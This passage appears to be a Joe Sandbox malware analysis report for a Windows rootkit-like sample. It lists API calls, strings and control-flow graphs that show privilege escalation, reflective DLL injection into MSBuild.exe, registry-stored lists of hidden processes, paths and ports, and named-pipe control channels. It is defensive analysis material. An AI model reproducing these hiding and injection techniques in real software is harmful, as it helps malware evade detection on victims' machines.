        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction ID: 0a4a2adaa71c8e2d6585264a3a96b2f0a0f5ebfb029d78899f901095b0af2348
        • Opcode Fuzzy Hash: ff4f71be338cb0fe5049debcf5759f5669753ac72572a0d232f439ca1a0f8997
        • Instruction Fuzzy Hash: 9771C336208B8342E774DF26B9963FA6796F385BD4F440236EE8947B89DE35D604C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: CurrentImageNonwritable__except_validate_context_record
        • String ID: csm
        • API String ID: 3242871069-1018135373
        • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction ID: bbacedfe8490290803dd36392004b56830fc8fe2e78bde83acae73a96b4d9274
        • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
        • Instruction Fuzzy Hash: 0151A0B2359A028AFB58CB15F444BB973A3F344B98F168535EE4A477ACDB78C849C700
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000003.2618275587.000001FD17760000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001FD17760000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_3_1fd17760000_conhost.jbxd
        Similarity
        • API ID: CallTranslator
        • String ID: MOC$RCC
        • API String ID: 3163161869-2084237596
        • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction ID: 98b539b98fb98127569a432fab64e2647f19adbf550e910acacf539860b74528
        • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
        • Instruction Fuzzy Hash: 38617B72508BC581EB719B25F4407FAB7A1F785B88F054229EF9807BA9CB78C198CF00
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: FileType
        • String ID: \\.\pipe\
        • API String ID: 3081899298-91387939
        • Opcode ID: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction ID: c090b82575a26dd4d3aed05f3a143ed8473bf9e76afdf1083b6a069f0351465a
        • Opcode Fuzzy Hash: bd677bffd8830a8f95fe5f2a714728342c990f231eb0fef724be370d7bbf4432
        • Instruction Fuzzy Hash: 6A51E23620C78381EB74DE2AB4563FA6793F394BA0F440235EED947B89DA3AD544C740
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ErrorFileLastWrite
        • String ID: U
        • API String ID: 442123175-4171548499
        • Opcode ID: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction ID: b0e14fd3dbe5a3a8e00d4859a859ab85cb16952d9393c1c0ccfd1ca0371ecda6
        • Opcode Fuzzy Hash: 608dbfc7eceb37b1c9531a955daf284e11a95c8252675cdfa91653c1712c9be4
        • Instruction Fuzzy Hash: F841B172629B818AEB20DF65F8457FAB7A6F388784F904131FA4D87758EB38C441CB40
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: ExceptionFileHeaderRaise
        • String ID: csm
        • API String ID: 2573137834-1018135373
        • Opcode ID: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction ID: a5397820f45ded7ed03cd20240f9d9682d920903e7ad00699c83dcbbd083d7b4
        • Opcode Fuzzy Hash: 0fa69785a085c04948c157334ebe0f5d9795e11839ffdc4193b8483db1e39a2c
        • Instruction Fuzzy Hash: D2110D32218B8182EB61CF15F8452A9B7E6F788B94F585225EECD47B65EF3CC551CB00
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocFree
        • String ID:
        • API String ID: 756756679-0
        • Opcode ID: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction ID: 79fa1af248de6b9c957953eac523c515370886705379ad54e3834685150e1c39
        • Opcode Fuzzy Hash: 4c9b2301a415d0f0b496c555fe445cf1af4f6cd5e16f1feadd66e218500f58a3
        • Instruction Fuzzy Hash: BC116D31A05F8185EB14CB66B8092B9B7B2F788FD0F584138EE8E53765EF78D4428300
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction ID: 4968d5de2bd157deb1f5297e8417d5062b13a7cfa6bf20d16db6a38339238360
        • Opcode Fuzzy Hash: 5766f835ea2a456c44b6013e96a3e1eda123ada506de8733bfa06fac8bd4a176
        • Instruction Fuzzy Hash: 15E06D326417059AE714CF62E80D3E936E2FB88F05F44C028C90907350EF7D84998741
        APIs
        Memory Dump Source
        • Source File: 00000024.00000002.2745949522.000001FD186D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001FD186D0000, based on PE: true
        • Associated: 00000024.00000002.2745892563.000001FD186D0000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746007350.000001FD186E5000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746062911.000001FD186F0000.00000004.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746198775.000001FD186F2000.00000002.00001000.00020000.00000000.sdmpDownload File
        • Associated: 00000024.00000002.2746263882.000001FD186F9000.00000002.00001000.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_36_2_1fd186d0000_conhost.jbxd
        Similarity
        • API ID: Heap$AllocProcess
        • String ID:
        • API String ID: 1617791916-0
        • Opcode ID: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction ID: e64253d61083728fc9ecf54d165262702ff6fa08e30c4bd456e7157e58a887e3
        • Opcode Fuzzy Hash: edf732acfe8a8b1979705777c81849703b5d4d240706bab5b6d58847dad35a27
        • Instruction Fuzzy Hash: 55E0E572651A05AAE728DB62E8092E976A2FB88B15F888034C90907320FE3884999A11

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 0 140002d4c-140002d5c 1 140002d5e-140002d75 OpenMutexW 0->1 2 140002d84-140002dc1 CloseHandle call 140002a0c * 2 GetCurrentProcessId OpenProcess 1->2 3 140002d77-140002d82 Sleep 1->3 8 140002dc3-140002dd7 OpenProcessToken 2->8 9 140002e39-140002e64 RegOpenKeyExW 2->9 3->1 12 140002dd9-140002dee LookupPrivilegeValueW 8->12 13 140002e30-140002e33 CloseHandle 8->13 10 1400031b3-1400031c1 9->10 11 140002e6a-140002e94 RegQueryValueExW 9->11 11->10 14 140002e9a-140002ec4 RegQueryValueExW 11->14 12->13 15 140002df0-140002e28 AdjustTokenPrivileges 12->15 13->9 14->10 16 140002eca-140002f36 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 14->16 15->13 17 140002e2a GetLastError 15->17 16->10 18 140002f3c-140002f66 RegQueryValueExW 16->18 17->13 18->10 19 140002f6c-140002fba RegCloseKey GetCurrentProcessId call 14000200c RegCreateKeyExW 18->19 22 14000307d-140003111 CreateThread GetProcessHeap HeapAlloc CreateThread * 2 call 14000151c 19->22 23 140002fc0-140002fe6 ConvertStringSecurityDescriptorToSecurityDescriptorW 19->23 30 140003113-140003143 ShellExecuteW 22->30 31 140003145-1400031ad call 14000148c call 1400011d4 call 14000148c * 3 call 1400011d4 * 3 GetProcessHeap HeapFree SleepEx 22->31 24 140003002-14000303a RegCreateKeyExW 23->24 25 140002fe8-140002ffc RegSetKeySecurity LocalFree 23->25 27 140003073-140003077 RegCloseKey 24->27 28 14000303c-14000306d GetCurrentProcessId RegSetValueExW RegCloseKey 24->28 25->24 27->22 28->27 30->30 30->31 31->10
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
        • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
        • API String ID: 2725631067-1382791509
        • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
        • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
        • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
        • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 48 140001868-1400018aa OpenProcess 49 140001cd1-140001ced 48->49 50 1400018b0-1400018c5 IsWow64Process 48->50 51 1400018d5 50->51 52 1400018c7-1400018d3 50->52 53 1400018db-1400018e7 CloseHandle 51->53 52->53 53->49 54 1400018ed-1400018f8 53->54 54->49 55 1400018fe-140001913 54->55 56 140001925 55->56 57 140001915-14000191a 55->57 59 140001927-140001929 56->59 57->49 58 140001920-140001923 57->58 58->59 59->49 60 14000192f-140001945 OpenProcess 59->60 60->49 61 14000194b-140001964 OpenProcess 60->61 62 140001a04-140001a23 NtQueryInformationProcess 61->62 63 14000196a-140001981 K32GetModuleFileNameExW 61->63 64 140001cc8-140001ccb CloseHandle 62->64 65 140001a29-140001a2d 62->65 66 1400019b3-1400019bf CloseHandle 63->66 67 140001983-14000199e PathFindFileNameW lstrlenW 63->67 64->49 65->64 68 140001a33-140001a4b OpenProcessToken 65->68 66->62 70 1400019c1-1400019db 66->70 67->66 69 1400019a0-1400019b0 StrCpyW 67->69 68->64 71 140001a51-140001a77 GetTokenInformation 68->71 69->66 72 1400019e0-1400019f2 StrCmpIW 70->72 73 140001af4 71->73 74 140001a79-140001a82 GetLastError 71->74 72->64 75 1400019f8-140001a02 72->75 77 140001afb-140001b09 CloseHandle 73->77 74->73 76 140001a84-140001a98 LocalAlloc 74->76 75->62 75->72 76->73 78 140001a9a-140001ac0 GetTokenInformation 76->78 77->64 79 140001b0f-140001b16 77->79 80 140001ae2 78->80 81 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 78->81 79->64 82 140001b1c-140001b27 79->82 83 140001ae9-140001af2 LocalFree 80->83 81->83 82->64 84 140001b2d-140001b37 82->84 83->77 85 140001b52 84->85 86 140001b39-140001b43 84->86 87 140001b56-140001b8e call 1400029a4 * 3 85->87 86->64 88 140001b49-140001b50 86->88 87->64 95 140001b94-140001bb4 call 1400029a4 StrStrA 87->95 88->87 98 140001bb6-140001bc6 95->98 99 140001bcd-140001bf2 call 1400029a4 * 2 95->99 98->95 100 140001bc8 98->100 99->64 105 140001bf8-140001c21 VirtualAllocEx 99->105 100->64 105->64 106 140001c27-140001c40 WriteProcessMemory 105->106 106->64 107 140001c46-140001c68 call 140002bfc 106->107 107->64 110 140001c6a-140001c72 107->110 110->64 111 140001c74-140001c81 WaitForSingleObject 110->111 112 140001c83-140001c97 GetExitCodeThread 111->112 113 140001cbd-140001cc2 CloseHandle 111->113 114 140001ca2-140001cbb VirtualFreeEx 112->114 115 140001c99-140001c9f 112->115 113->64 114->113 115->114
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
        • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
        • API String ID: 2456419452-2628171563
        • Opcode ID: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
        • Instruction ID: 2a11411cfc832b8c6424502e8b4f1e91c9a7b64b89c06221b22f1678334b3336
        • Opcode Fuzzy Hash: 2d2d9d352461c9b57aa585ec06d48b5b40d6395f47d72d8764cd192164728847
        • Instruction Fuzzy Hash: E6C15BB1700A8186EB66DF23B8907EA27A5FB8CBC4F444125EF4A477A5EF38C945C740

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 167 140003204-140003225 168 14000322b 167->168 169 14000341d-140003423 167->169 170 140003231-140003237 168->170 171 14000338b-1400033c3 GetProcessHeap HeapAlloc K32EnumProcesses 168->171 172 140003599-1400035bd ReadFile 169->172 173 140003429-14000342c 169->173 174 140003382-140003384 ExitProcess 170->174 175 14000323d-140003240 170->175 176 140003652-140003664 171->176 180 1400033c9-1400033da 171->180 172->176 177 1400035c3-1400035ca 172->177 178 140003432-140003438 173->178 179 14000358f-140003594 call 140001f7c 173->179 182 140003246-140003249 175->182 183 1400032ea-140003315 RegOpenKeyExW 175->183 177->176 184 1400035d0-14000360b GetProcessHeap HeapAlloc call 140001cf0 177->184 185 140003534-140003547 call 1400020fc 178->185 186 14000343e-140003441 178->186 179->176 180->176 187 1400033e0-140003409 call 140001868 * 2 180->187 192 1400032db-1400032e5 182->192 193 14000324f-140003252 182->193 188 140003353-14000337d call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 183->188 189 140003317-14000334d RegDeleteValueW * 3 183->189 210 14000360d-140003613 184->210 211 14000363e-14000364c GetProcessHeap HeapFree 184->211 185->176 213 14000354d-14000355c call 1400020fc 185->213 195 140003443-140003449 186->195 196 140003480-140003491 call 1400020fc 186->196 215 14000340e-140003416 187->215 188->176 189->188 192->176 201 140003254-14000325a 193->201 202 1400032ce-1400032d6 193->202 195->176 204 14000344f-140003479 call 140002c5c call 140002c88 ExitProcess 195->204 196->176 214 140003497-1400034b9 ReadFile 196->214 201->176 209 140003260-140003284 ReadFile 201->209 202->176 209->176 217 14000328a-140003291 209->217 210->211 218 140003615-140003627 210->218 211->176 213->176 235 140003562-14000358a ShellExecuteW 213->235 214->176 221 1400034bf-1400034c6 214->221 215->187 222 140003418 215->222 217->176 224 140003297-1400032c9 call 140001868 * 2 217->224 225 140003629-14000362b 218->225 226 14000362d-140003635 218->226 221->176 229 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 221->229 222->176 224->176 225->226 232 140003639 call 140001eec 225->232 226->218 233 140003637 226->233 229->211 236 140003510-14000351c 229->236 232->211 233->211 235->176 236->211 240 140003522-14000352f call 140002434 236->240 240->211
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
        • String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
        • API String ID: 4225498131-1538754800
        • Opcode ID: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
        • Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
        • Opcode Fuzzy Hash: 3407ad9d7cfcb5975a2e83ecadca061c5ac97008c8c89d8cb2dbdbb065867439
        • Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
        • String ID:
        • API String ID: 4084875642-0
        • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
        • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
        • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
        • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

        Control-flow Graph

        APIs
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
        • String ID:
        • API String ID: 3197395349-0
        • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
        • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
        • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
        • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
        • String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
        • API String ID: 3993315683-3414887735
        • Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
        • Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
        • Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
        • Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
        • String ID: .text$C:\Windows\System32\
        • API String ID: 2721474350-832442975
        • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
        • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
        • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
        • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

        Control-flow Graph

        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
        • String ID: M$\\.\pipe\$rbx-childproc
        • API String ID: 2203880229-2840927681
        • Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
        • Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
        • Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
        • Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 294 140002cb0-140002cba 295 140002cbd-140002cd0 call 140002300 294->295 298 140002cd2-140002cdb Sleep 295->298 299 140002cdd-140002cea ConnectNamedPipe 295->299 298->295 300 140002d21-140002d26 Sleep 299->300 301 140002cec-140002d0d ReadFile 299->301 302 140002d2c-140002d35 DisconnectNamedPipe 300->302 301->302 303 140002d0f-140002d14 301->303 302->299 303->302 304 140002d16-140002d1d call 140003204 303->304 305 140002d1f 304->305 305->302
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000025.00000002.2972221833.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
        • Associated: 00000025.00000002.2971378256.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2973271427.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
        • Associated: 00000025.00000002.2974486932.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_37_2_140000000_dllhost.jbxd
        Similarity
        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
        • String ID: \\.\pipe\$rbx-control
        • API String ID: 2071455217-3647231676
        • Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
        • Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
        • Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
        • Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704

        Control-flow Graph

        • Executed
        • Not Executed
